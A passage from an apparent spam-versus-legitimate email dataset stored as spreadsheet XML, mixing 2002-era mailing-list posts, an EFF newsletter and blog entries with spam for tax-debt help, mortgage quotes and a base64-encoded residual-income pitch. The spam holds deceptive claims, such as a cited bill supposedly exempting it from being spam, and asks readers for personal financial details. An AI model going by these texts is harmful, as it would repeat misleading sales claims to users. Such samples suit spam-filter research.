 receive future offers from us click below and type 'remove' in the subject line. 
 &lt;BR&gt;&lt;A 
 href="mailto:no_thanks3321@btamail.net.cn%20&lt;no_thanks3321@btamail.net.cn&gt;"&gt;Unsubscribe&lt;/A&gt; 
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Insert signature
</t>
  </si>
  <si>
    <t xml:space="preserve">In a message dated: Thu, 22 Aug 2002 13:03:57 CDT
 Ulises Ponce said:
 &gt;Thanks Tony, but I think doing it using component files will get a .signature 
 &gt;by default, but I have many diferent signatures and I want to insert one of 
 &gt;that signatures using a keyboard command. So for a message I will insert a 
 &gt;signature, but for another message I will insert a different signature.
 &gt;
 &gt;Is it possible? I am using sedit for my messages.
 Ahm, if you don't object to using a mouse for such things, exmh has 
 the ability to insert different sigs on demand.  Create a bunch of 
 different sig files, all beginning with .signature, and at start up, 
 exmh will load them all.  In the Sedit window, you'll see a Sign...
 menu item which will allow you to select between each of the listed 
 .signature files for *that* e-mail.  You can actually use several if 
 you'd like (though I don't remember what Preferences... option allows 
 for this).
 However, the signature gets added on send, not inserted directly into 
 the existing Sedit window prior to composition.
 I currently have 6 different sig files I can choose between.
 Additionally, if a .signature file has the execute bit turned on, 
 exmh will attempt to execute the file and use the stdout of the 
 script as your signature.
 I hope this helps some.
 -- 
 Seeya,
 Paul
 --
 	It may look like I'm just sitting here doing nothing,
    but I'm really actively waiting for all my problems to go away.
 	 If you're not having fun, you're not doing it right!
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Have Tax Problems? [rjgu10]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Have tax problems? Do you owe the IRS money? If your debt is
 $10,000 US or more, we can help! Our licensed agents can help
 you with both past and present tax debt. We have direct contacts
 with the IRS, so once your application is processed we can help
 you immediately without further delay.
 Also, as our client we can offer you other services and help with
 other problems such as:
 - Tax Preparation
 - Audits
 - Seizures
 - Bank Levies
 - Asset Protection
 - Audit Reconsideration
 - Trust Fund Penalty Defense
 - Penalty Appeals
 - Penalty Abatement
 - Wage Garnishments
 .. and more!
 To receive FREE information on tax help, please fill out the
 form below and return it to us. There are no obligations, and
 supplied information is kept strictly confidential. Please note
 that this offer only applies to US citizens. Application
 processing may take up to 10 business days.
 **********
 Full Name: 
 State: 
 Phone Number: 
 Time to Call: 
 Estimated Tax Debt Size: 
 **********
 Thank you for your time.
 Note: If you wish to receive no further advertisements regarding
 this matter or any other, please reply to this e-mail with the
 word REMOVE in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your order#               5056
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"1" cellpadding=3D"0" cellspacing=3D"0" style=3D"border-=
 collapse: collapse" bordercolor=3D"#111111" width=3D"511" height=3D"308" i=
 d=3D"AutoNumber1"&gt;
     &lt;tr&gt;
       &lt;td width=3D"511" height=3D"308" valign=3D"top" bgcolor=3D"#EBEBEB"&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080" size=3D"5"&gt;Shopping f=
 or a loan 
       has never been easier&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Get a free quote on a ne=
 w First 
       Mortgage, Second Mortgage, or a Credit Line with no cost or obligati=
 on.&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;We can help you get a gr=
 eat loan 
       regardless of your credit situation&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;It's a great time to buy=
  or 
       refinance your home.&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080"&gt;Whether you want to:&lt;=
 /font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Buy a new home - consoli=
 date your 
       debts&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Refinance to lower your =
 payments&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;Take some equity out of =
 your home 
       for any reason&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#000080"&gt;We can help!&lt;/font&gt;&lt;/=
 b&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080" size=3D"4"&gt;
       &lt;a href=3D"http://www.money-helps.com"&gt;Click here and get a free quo=
 te!&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;&lt;b&gt;You have nothing to l=
 ose!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
       &lt;p align=3D"center"&gt;&lt;font color=3D"#000080"&gt;
       &lt;a href=3D"http://www.clik4you.com/removes/deptoff.htm"&gt;To not recei=
 ve this 
       email again click here&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt; ...
 &gt; - A program that acts both as a pop client and a pop server.  You
 &gt;   configure it by telling it about your real pop servers.  You then
 &gt;   point your mail reader to the pop server at localhost.  When it
 &gt;   receives a connection, it connects to the remote pop servers, reads
 &gt;   your mail, and gives you only the non-spam.
 FYI, I'll never trust such a scheme:  I have no tolerance for false
 positives, and indeed do nothing to try to block spam on any of my email
 accounts now for that reason.  Deliver all suspected spam to a Spam folder
 instead and I'd love it.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet radio - example from a college station
</t>
  </si>
  <si>
    <t xml:space="preserve">Just thought i'd pass this on, my favorite radio station in raleigh is 
 going off the internet due to the new fees and restrictions associated 
 with remaining online.  this is from the station manager and describes the 
 situation.
 ---------- Forwarded message ----------
 Date: Tue, 3 Sep 2002 13:13:17 -0400
 From: Arielle &lt;gm@wknc.org&gt;
 Subject: RE: KNC Stream [1:51144:51751]
 This message was sent from: WKNC Chat.
 &lt;http://wknc.org/forum/read.php?f=1&amp;i=51751&amp;t=51144&gt; 
 ----------------------------------------------------------------
 It does, but it's not the cost that is causing us to shut it down. The cost
 is a "minimum $500 per year"... but that only accounts for 18 people
 streaming and playing like 13 or 14 songs an hour. But we could maybe manage
 the 2 cents per person, per 100 songs.
 The problem comes with the record keeping they mandate with webstreaming.
 Start and end times for every song (not too hard), artist (okay), title
 (okay), composers (a little harder), serial number (wtf??). I think there
 are a few more things they wanted, but honestly, programming this info in
 for every song that we play is ridiculous. This means we'd also have to get
 all the DJs to find this info and write it down any time they play a
 request, vinyl, or CDs not loaded into the computer. It's ridiculous and
 nearly impossible...
 We would need someone to sit in the studio 24/7 writing down all this info -
 which sometimes isn't available, like from earlier album that don't have
 serial numbers and barcodes. Then still if only the magic 18 people
 webstream our signal, the price would become quite exponential since we play
 on average 16 songs an hour, we'd be paying $22.11 everyday to stream to
 those 18 people. So really, it does have to do with the internet tax, but it
 is a few reasons together why we can't do it after their kill-date. :(
 ----------------------------------------------------------------
 Sent using Phorum software version 3.2.6 &lt;http://phorum.org&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EFFector 15.35: ALERT UPDATE: Urge Your Representative to Co-Sponsor the DMCRA!
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 35       November 8, 2002     ren@eff.org
 A Publication of the Electronic Frontier Foundation     ISSN 1062-9424
 In the 234th Issue of EFFector:
     * ALERT UPDATE: Urge Your Representative to Co-Sponsor the DMCRA!
     * ALERT: Bait and Switch: Anticounterfeiting Bill Hurts Your 
       Rights!
     * Canadian Trademark Law Overreaching
     * Give Twice as Many Gifts this Holiday Season!
     * Deep Links (4): Security Technologies Could Backfire Against 
       Consumers
     * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
   http://www.eff.org/support/
 EFF is a member-supported nonprofit. Please sign up as a member today!
 -----------------------------------------------------------------
 * ALERT UPDATE: Urge Your Representative to Co-Sponsor the DMCRA!
 As the legislative season ends, it is vitally important to gather
 support for legislation that will be center-stage in the next session.
 This is an opportunity to ask your representative to take a stand for
 your rights. Ask her/him to co-sponsor the DMCRA today!
 Representatives Rick Boucher and John Doolittle recently introduced
 the Digital Media Consumers' Rights Act (DMCRA, H.R. 5544), which
 would require labelling on usage-impaired "copy-protected" compact
 discs and would make several several amendments to 1998's infamous
 Digital Millennium Copyright Act (DMCA).
 Take action here:
 http://action.eff.org/action/index.asp?step=2&amp;item=2224
 Join EFF! For membership information see:
 http://www.eff.org/support/
 -=end=-----------------------------------------------------------
 * ALERT: Bait and Switch; Anticounterfeiting Bill Hurts Your Rights!
 Don't be fooled by Senator Biden's "Anticounterfeiting Amendments of
 2002" (S. 2395, also known as "the Biden Bill"). It started as an
 attempt to stop organized crime from forging holograms and
 counterfeiting money, but its scope has been greatly expanded to
 include digital watermarks on copyrighted material. This is a sneaky
 power-grab that would greatly diminish the rights of the public in
 copyrighted works while expanding the power of copyright owners. It
 goes well beyond the scope of current copyright law and could:
 ~ Prevent universities, libraries, and consumers from enjoying the
 exceptions to the Copyright Act adopted by Congress. S. 2935 could
 prohibit the use of interface information essential for software
 interoperability and competition
 ~ Impose new responsibilities on Internet service providers and could
 also require consumer electronics and computer manufacturers to
 reconfigure their products.
 ~ Impose more severe criminal and civil penalties than permitted by
 the Copyright Act for identical behavior
 This "anticounterfeiting" bill is a decoy; stand up for your rights
 today! Subscribe to the EFF Action Center and send your member of
 Congress an email, letter or fax. You can take action by going to:
 http://action.eff.org/action/index.asp?step=2&amp;item=2274
 Join EFF! For membership information see:
 http://www.eff.org/support/
 -=end=-----------------------------------------------------------
 * Canadian Trademark Law Overreaching
 EFF has been involved in several cases involving overreaching
 trademark claims on the Internet. Recently we have learned about a
 Canadian lawsuit over the website www.lawsnet.com, a nonprofit legal
 information website focusing on the laws of Canada and China that seem
 especially egregious.
 Lawsnet.com is a free legal information website that has been
 published since 1998. Last year, Lawsnet.com's owner Ling Xia was sued
 by Quicklaw, a subsidiary of global publishing giant LexisNexus Group.
 Quicklaw claims that Lawsnet.com violates its rights in the name
 LAW/NET. However, LAW/NET does not have a public Internet website
 under that domain name. The name appears on a subsidiary webpage of
 the Quicklaw.com website that offers public "teasers" in the form of
 summaries of recent Canadian cases, with the full text only available
 through the private, proprietary paid Quicklaw service for Canadian
 lawyers. It seems clear that the two names are substantially
 different, are used in different places (one as a teaser for a closed
 computer service and the other for information freely available on the
 public internet) and are not causing any consumer confusion. Even more
 problematic, Quicklaw does not even have a Canadian trademark in the
 term LAW/NET -- it applied for one in 1997 but has repeatedly filed
 requests for extensions of time with the Canadian trademark
 authorities. In contrast, Ms. Xia is in the final stages of having a
 Canadian trademark issued for "lawsnet."
 Regardless of its weak case, Quicklaw has managed to drag Ms. Xia
 through over a year of litigation and recently succeeded in securing a
 court order requiring her to undergo an extensive "discovery" process
 that threatens to drive her under. Although she has had some free
 legal assistance in the past, this next phase will require
 significantly more legal resources than her volunteer attorneys can
 muster. Quicklaw is represented by a large Toronto firm, Borden Ladner
 and Gervais, LLP.
 Abuse of trademark law (even here, when no official trademark has even
 been granted) is a growing problem on the Internet, and it is
 unfortunately becoming an international problem. EFF urges Quicklaw,
 and its US-based parent company, to stop beating up on this free and
 useful website. While trademark law is important when misuse of a mark
 is causing consumer confusion, it does not -- and should not -- grant
 ownership in words, especially descriptive words like "laws" and "net"
 when describing an online legal information service. Trademark law
 should also not be a license for large corporations who sell legal
 information (or any other nonproprietary information) to stop
 individuals who want to use the power of the Internet to provide free
 legal information to the public.
 For those who wish to help Ms. Xia directly, local Toronto lawyer and
 part-time law professor Gil Lan has agreed to act as trustee for a
 legal defence fund to be established for Ms. Xia. If you wish to help,
 please contact:
 Mr. Gil Lan
 Barrister &amp; Solicitor
 393 University Avenue
 Suite 2000
 Toronto, Ontario, M5G 1E6
 or by email at:
 glan@globalbusinesslaw.com
 or Ling Xia at:
 editor@lawsnet.com
 -=end=-----------------------------------------------------------
 * Give Twice as Many Gifts this Holiday Season!
 EFF has signed up with ShopsThatGive.com, a portal site for dozens of
 online shops that donates a portion of their referral fees to a
 charity of your choice. If you shop online at any of the websites
 available through ShopsThatGive, including Alibris, buy.com, Disney
 Store, eBay, eToys, Half.com, Lens Express, McAfee, Office Depot,
 Palm, Petsmart, REI, Rail Europe, and Verizon Wireless, part of your
 purchase can be donated back to EFF. From the main ShopsThatGive page,
 simply select EFF as your designated cause, select a merchant or
 category, and you're all set. It won't cost you anything extra and it
 would help us out a lot. Please keep this giving opportunity in mind,
 especially throughout the upcoming holiday season.
 Links:
 ShopsThatGive:
 http://www.shopsthatgive.com/
 Complete List of Participating Merchants:
 http://www.shopsthatgive.com/category.aspx
 Buy EFF-related books through Amazon or Barnes&amp;Noble:
 http://www.eff.org/promo/books.html
 -=end=-----------------------------------------------------------
 * Deep Links
 Deep Links features noteworthy news items, victories, and threats from
 around the Internet.
 ~ Security Technologies Could Backfire Against Consumers
 Robert Lemos at news.com with a balanced piece on trusted computing.
 http://news.com.com/2009-1001-964628.html?tag=fd_lede1_hed
 ~ Barbie's Kinky Rival Wins First Court Battle
 Mattel loses first round in intellectual property battle over S&amp;M doll
 with Barbie head.
 http://www.thescotsman.co.uk/international.cfm?id=1242812002
 ~ Unspooled
 In the digital age, the quaint cassette is sent reeling into history's
 dustbin.
 http://www.washingtonpost.com/wp-dyn/articles/A32476-2002Oct28.html
 ~ The Meaning and Importance of the TEACH Act
 The American Library Association on the latest amendment to US
 copyright law.
 http://www.ala.org/washoff/teach.html
 -=end=-----------------------------------------------------------
 * Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation
 454 Shotwell Street
 San Francisco CA 94110-1914 USA
 +1 415 436 9333 (voice)
 +1 415 436 9993 (fax)
   http://www.eff.org/
 Editor:
 Ren Bucholz, Activist
   ren@eff.org
 To Join EFF online, or make an additional donation, go to:
   http://www.eff.org/support/
 Membership &amp; donation queries: membership@eff.org
 General EFF, legal, policy or online resources queries: ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors for
 their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, please visit http://action.eff.org/subscribe/.
 &gt;&gt;From there, you can update all your information. If you have already
 subscribed to the EFF Action Center, please visit
 http://action.eff.org/action/login.asp.
 To unsubscribe from the EFFector mailing list, send an email to
 alerts@action.eff.org with the word "Remove" in the subject.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at:
   http://www.eff.org/effector 
 ++++++++++++++++++++++++
 You received this message because legit-lists-eff@jmason.org is a member of
 the mailing list originating from alerts@action.eff.org. To unsubscribe 
 from all mailing lists originating from alerts@action.eff.org, send an 
 email from legit-lists-eff@jmason.org to alerts@action.eff.org with 'Remove' as the
 only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Slashdot reports that Amazon still wants to patent the Web.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:30:51AM
 Date: Mon, 23 Sep 2002 15:30:51 GMT
 Slashdot reports[1] that Amazon still wants to patent the Web.
 [1] http://slashdot.org/article.pl?sid=02/09/23/1156216&amp;mode=thread&amp;tid=155
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Welcome to the concept of RESIDUAL Income!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_0044_5A8512D6.AD3AE071
 Content-Type: text/plain
 Content-Transfer-Encoding: base64
 VGhlcmUncyBvbmx5IG9uZSB0aGluZyBiZXR0ZXIgdGhhbiBhIG1hcmtldCBkcml2ZW4gYnVz
 aW5lc3MgYW5kIA0KdGhhdCdzIGEgbWFya2V0IGRyaXZlbiBidXNpbmVzcyB0aGF0IG9mZmVy
 cyBjb25zdW1hYmxlIHByb2R1Y3RzLiAgDQpBbmQgdGhhdCBpcyBleGFjdGx5IHdoYXQgb3Vy
 IHN5c3RlbSBoYXMgdG8gb2ZmZXIgeW91Lg0KDQpXZSBvZmZlciBwcm9kdWN0cyB0aGF0IG1p
 bGxpb25zIG9mIHBlb3BsZSBhYnNvbHV0ZWx5IG11c3QgaGF2ZQ0KYW5kIHRoZSBiZXN0IHBh
 cnQgb2YgYWxsLCBvdXIgcHJvZHVjdHMgYXJlIGNvbnN1bWFibGUuDQogDQpXaHkgaXMgdGhh
 dCBzbyBpbXBvcnRhbnQ/DQoNCldoYXQgZG8geW91IGRvIHdoZW4geW91IHJ1biBvdXQgb2Yg
 dG9pbGV0IHBhcGVyPw0KRG8geW91IGdvIHdhdGNoIFRWIHVudGlsIHlvdSBzZWUgYW4gYWQg
 Zm9yIHRvaWxldCBwYXBlciAgDQpkbyB5b3Ugc3RhcnQgY3V0dGluZyB1cCB5b3VyIHNoZWV0
 cyBpbnRvIHNtYWxsIHBpZWNlcw0Kb3IgZG8geW91IGp1c3QgR08gVE8gVEhFIFNUT1JFIEFO
 RCBHRVQgU09NRSBNT1JFPw0KDQpZb3Ugc2VlLCBub3Qgb25seSBkbyBvdXIgY3VzdG9tZXJz
 IGVuam95IHRoZSBmYW50YXN0aWMgYmVuZWZpdHMNCm9mIG91ciBwcm9kdWN0cywgZXZlcnkg
 dGltZSB0aGV5IHJ1biBvdXQgIHRoZXkgY29tZSBiYWNrDQp0byBVUyB0byBHRVQgTU9SRS4g
 IFdlIHdvcmsgd2l0aCB0aGVtIG9uZSB0aW1lIGJ1dCB3ZSBnZXQgcGFpZA0Kb3ZlciBhbmQg
 b3ZlciBhZ2FpbiENCg0KV0VMQ09NRSBUTyBUSEUgQ09OQ0VQVCBPRiBSRVNJRFVBTCBJTkNP
 TUUgIG1vbmV5IHRoYXQganVzdCANCmtlZXBzIGNvbWluZyBhbmQgY29taW5nLg0KDQpXaGF0
 IHdvdWxkIHlvdSBkbyB3aXRoIGFuIGV4dHJhICQxLDAwMCBuZXh0IG1vbnRoPw0KDQpJRiBU
 SElTIEJVU0lORVNTIElTIFNPIEdSRUFULCBXSFkgRE9OJ1QgWU9VIEpVU1QgRE8gSVQgDQpZ
 T1VSU0VMRj8NCg0KR29vZCBxdWVzdGlvbi4gIEFuZCBoZXJlJ3MgeW91ciBhbnN3ZXIuICBB
 bGwgb2YgdXMgZG8hDQoNClRoZSBmYWN0IGlzIHRoYXQgd2UgbWFrZSBldmVuIG1vcmUgbW9u
 ZXkgZWFjaCB0aW1lIHdlIGhlbHAgc29tZW9uZQ0KbGlrZSB5b3UgZ2V0IHN0YXJ0ZWQuIFdF
 IE5FRUQgWU9VLiAgV2UgY2FuJ3Qgc3VjY2VlZCB1bmxlc3Mgd2UgbWFrZQ0KeW91IHN1Y2Nl
 ZWQuICBXZSB3aWxsIHRha2UgeW91IGJ5IHRoZSBoYW5kIGFuZCB3YWxrIHlvdSB0aHJvdWdo
 IHRoaXMgDQpidXNpbmVzcyBzdGVwLWJ5LXN0ZXAuICBXRSBXSUxMIERPIFdIQVRFVkVSIElU
 IFRBS0VTLCAgdGhhdCANCmlzIG91ciBjb21taXRtZW50IHRvIHlvdS4NCg0KSXQgZG9lc24n
 dCB0YWtlIGEgbG90IG9mIG1vbmV5LCB0aW1lIG9yIGtub3dsZWRnZSB0byBhY2hpZXZlIA0K
 dGhlIERyZWFtLiAgQWxsIHlvdSBuZWVkIGlzIHRoZSByaWdodCBvcHBvcnR1bml0eSBhdCB0
 aGUgDQpyaWdodCB0aW1lLCBhIHByb2R1Y3QgdGhhdCBzZWxscyBpdHNlbGYsIGEgcGxhbiB0
 byBmb2xsb3cgDQphbmQgeW91ciBvd24gcGVyc29uYWwgY29hY2ggYW5kIG1lbnRvci4NCg0K
 SWYgeW91IGFyZSBhIG1vdGl2YXRlZCBwZXJzb24sIGxvb2tpbmcgZm9yIGEgcG9zaXRpdmUg
 Y2hhbmdlLCB0aGVuIA0KeW91IGFyZSBpbiB0aGUgcmlnaHQgcGxhY2UuDQoNCklmIGEgcGVy
 c29uYWwgY29hY2ggYW5kIG1lbnRvciwgd2hvIGNhcmVzIGFib3V0IHlvdSwgaG9sZGluZyB5
 b3VyDQpoYW5kIHRocm91Z2ggdGhlIGVudGlyZSBwcm9jZXNzIG9mIHN0YXJ0aW5nIHlvdXIg
 YnVzaW5lc3Mgc291bmRzIA0KZ29vZCwgIHRoZW4gdGhpcyBpcyBpdCENCg0KQnV0IHdlJ3Jl
 IG5vdCBsb29raW5nIGZvciBKVVNUIEFOWU9ORS4gIFdlJ3JlIGxvb2tpbmcgZm9yIA0KTU9U
 SVZBVEVEIHBlb3BsZSB3aG8gYXJlIFNFUklPVVMgYWJvdXQgaW1wcm92aW5nIHRoZSANClFV
 QUxJVFkgb2YgVEhFSVIgbGl2ZXMuDQoNCiJUSU1JTkcgSVMgRVZFUllUSElORyCFDQpJIFdB
 UyBKVVNUIElOIFRIRSBSSUdIVCBQTEFDRSBBVCBUSEUgUklHSFQgVElNRSINCg0KWW91J3Jl
 IGluIHRoZSByaWdodCBwbGFjZSBhbmQgeW91ciB0aW1pbmcgaXMgcGVyZmVjdC4NCg0KVmlz
 aXQgIGh0dHA6Ly93d3cucGF5Y2hlY2tzNGxpZmUuY29tICBhbmQgdGFrZSBhZHZhbnRhZ2Ug
 b2YgDQp0aGlzIGZhYnVsb3VzIG9wcG9ydHVuaXR5IHRvZGF5ISAgSXQganVzdCBtYXkgY2hh
 bmdlIHlvdXIgbGlmZS4NCg0KV2UgUmVzcGVjdCBZb3VyIFByaXZhY3ksIGFuZCBQbGVkZ2Ug
 bm90IHRvIEFidXNlIFRoaXMgUHJpdmlsZWdlLiBUbyANClN0b3AgRnV0dXJlIE1haWxpbmdz
 LA0KcmVwbHkgdG8gdGhpcyBlbWFpbCB3aXRoIFJFTU9WRSBpbiB0aGUgc3ViamVjdCBsaW5l
 LCB5b3Ugd2lsbCBiZSByZW1vdmVkIA0KaW1lZGlhdGVseS4NCm9yIHNlbmQgYSBibGFuayBl
 bWFpbCB3aXRoIHJlbW92ZSBpbiBzdWJqZWN0IHRvOg0KDQpyZW1vdmVAcGF5Y2hlY2tzNGxp
 ZmUuY29tDQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
 LS0tLS0tLS0tLS0tLS0tDQpZb3UgYXJlIHJlY2VpdmluZyB0aGlzIG1lc3NhZ2UgYmVjYXVz
 ZSB5b3UgaGF2ZSByZWNlbnRseSBleHByZXNzZWQgYW4gDQppbnRlcmVzdCBpbiByZWNlaXZp
 bmcgaW5mb3JtYXRpb24gYWJvdXQgb25saW5lIGJ1c2luZXNzIG9wcG9ydHVuaXRpZXMuIA0K
 SWYgdGhpcyBpcyBpbiBlcnJvciB0aGVuIHBsZWFzZSBhY2NlcHQgbXkgbW9zdCBzaW5jZXJl
 IGFwb2xvZ3ksIGFuZCANCnNpbXBseSBVbnN1YnNjcmliZSB5b3Vyc2VsZiBiZWxvdy4NCi0t
 LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
 LS0tDQpVbmRlciBCaWxsIFMxNjE4IFRpdGxlIElJSSBwYXNzZWQgYnkgdGhlIDEwNXRoIFVT
 IENvbmdyZXNzLCB0aGlzIA0KbWVzc2FnZSBzaGFsbCBub3QgYmUgY29uc2lkZXJlZCBTUEFN
 IGFzIHRoZSBzZW5kZXIgaGFzIGluY2x1ZGVkIA0KY29udGFjdCBpbmZvcm1hdGlvbiBhbmQg
 YW4gaW1tZWRpYXRlIG1ldGhvZCBvZiBSZW1vdmFsLg0KICAgIA==
 ------=_NextPart_000_0044_5A8512D6.AD3AE071--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The Semantic Web makes me sick
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/23.html#the_semantic_web_makes_me_sick
 Date: 2002-09-23T09:27:30-05:00
 No, really. My sinus infection, which appeared to be gone, flared up again over 
 the weekend in the nastiest way, and I am now coughing up dark mucus and doing 
 other things that probably don't bear repeating in a public forum. I have the 
 10:15 doctor's appointment that I should have made last round, had I not 
 convinced myself that &amp;#8220;it's not that bad&amp;#8221; and trudged through it 
 all without prescription drugs. I'm not making the same mistake this time. I'll 
 be back this afternoon. 
 My email problems of yesterday have been resolved. You can once again reach me 
 at my normal address, f8dy@diveintomark.org. 
 Kevin Burton[1] emailed me with another way to link to a FOAF file from my RSS 
 feed. It looks easier than previous suggestions, and it has the advantage of 
 being able to use it from an RSS 1.0 or 2.0 feed, but I worry about all these 
 variations. Just as in real life, where people can use different words that 
 mean essentially the same thing, in the Semantic Web programs can use different 
 vocabularies to express the same statements. That's great for producers, not so 
 great for consumers who have to make sense of it all. 
 For each domain (RSS feeds, FOAF files, whatever), somebody (or some group) 
 needs to come along and document best practices. We need better _goal-oriented_ 
 documentation. We have a lot of reference documentation, task-oriented 
 documentation, but very little that documents that larger picture and answers 
 questions written in English. &amp;#8220;How do I include personal information in 
 my RSS feed?&amp;#8221; is a goal-oriented question. &amp;#8220;Create a FOAF file 
 using this tool and then insert this line at this location in your RSS 
 feed&amp;#8221; (with as many examples as necessary) is a goal-oriented answer. 
 Anything less is like trying to master a foreign language by reading a 
 dictionary.
 [1] http://www.peerfear.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] US Army tests portable translator
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/technology/2219079.stm
 US soldiers on peacekeeping duties in the future could find that a portable
 translation device will be an essential part of their equipment. 
 Scientists at Carnegie Mellon University have developed a prototype of a
 speech translator that was road-tested by US Army chaplains in Croatia. 
 "This project shows how a relatively simple speech-to-speech translation
 system can be rapidly and successfully constructed using today's tools,"
 said the team from Carnegie Mellon University in a research paper published
 recently. 
 The research was commissioned by the US Army, which is increasingly finding
 itself in peace-keeping roles where communication is key. 
 Speaking in tongues 
 "In the Balkans, the Army is not just supposed to conquer somebody," Robert
 Frederking of Carnegie Mellon University told the BBC programme Go Digital. 
 Translators could be essential for US soldiers
 "In a peacekeeping situation, you have two guys trying to beat each other up
 and you are holding them apart. 
 "You can't just shot one of them, you have to figure what is going on and
 talk to them," he said. 
 The portable translator was developed with a year, using commercially
 available laptops. 
 The Army did not want to field-test the device in a battlefield situation.
 So instead the translator was tested by US Army chaplains in Croatia. 
 "The chaplains very often end up having to talk to foreign nationals and
 typically don't have any translation support," explained Mr Frederking. 
 Slow system 
 For the trials, the chaplains used the translator to speak to Croatians who
 knew just a smattering of English. 
 The system works by having a speech recogniser that picks up the words in
 Croatian, turns the speech into text. The written words are then translated
 into English and read out by a speech synthesizer. 
 "It went reasonably well half the time," said Mr Frederking, though it was
 slow in translating phrases. 
 The research team admit that the system is not ready to be deployed in the
 field. 
 But they say their trials showed that a portable translator could be made to
 work with further research and development. 
 The Audio Voice Translation Guide System project was a joint venture between
 the US Army, the military manufacturer Lockheed Martin and Carnegie Mellon
 University. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Receive Phone Calls and Faxes While You're Online!
 Emerson Switchboard eliminates the need for a second phone line.
 Order the Switchboard today for $39.95 + shipping and handling.
 http://us.click.yahoo.com/P2sPyA/o6kEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Yahoo Finance RSS Beta
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000187.html
 Date: 2002-09-23T11:47:57-08:00
 Got a stock ticker for which you'd like to have an RSS news feed? Help test the 
 beta RSS feeds we've put up o Yahoo Finance. Take your favorite ticker, say 
 YHOO, and put this URL in your news aggregator:...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Piping to multiple processes (which might die)?
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Brian Foster &lt;blf@utvinternet.ie&gt;:
 &gt;   | I did the following:
 &gt;   | 
 &gt;  1|   $ mkfifo f1
 &gt;  2|   $ lav2yuv capture.avi | yuvdenoise | tee f1 | mpeg2enc blah blah &amp;
 &gt;  3|   $ cat f1 | mpeg2enc different blah blah
 &gt;   | 
 &gt;   | And hey! It works!  Until somebody dies!  Yippe... oh.  [ ... ]
 &gt; 
 &gt;  ( a winner of the Useless Use of cat(1) Award:  you don't need
 &gt;   the `cat f1 |' in the 3rd line, a simple `&lt;f1' will suffice. )
 Grrr... I've had that bad habit since MS-DOS 3.2
 &gt;  upshot is a POSIX.2 `tee' would probably spit out an error
 &gt;  message if one of the `mpeg2enc's dies, but the remaining
 &gt;  one would continue to be fed data and hence run until it
 &gt;  either completes or dies for reasons of its own.  which is
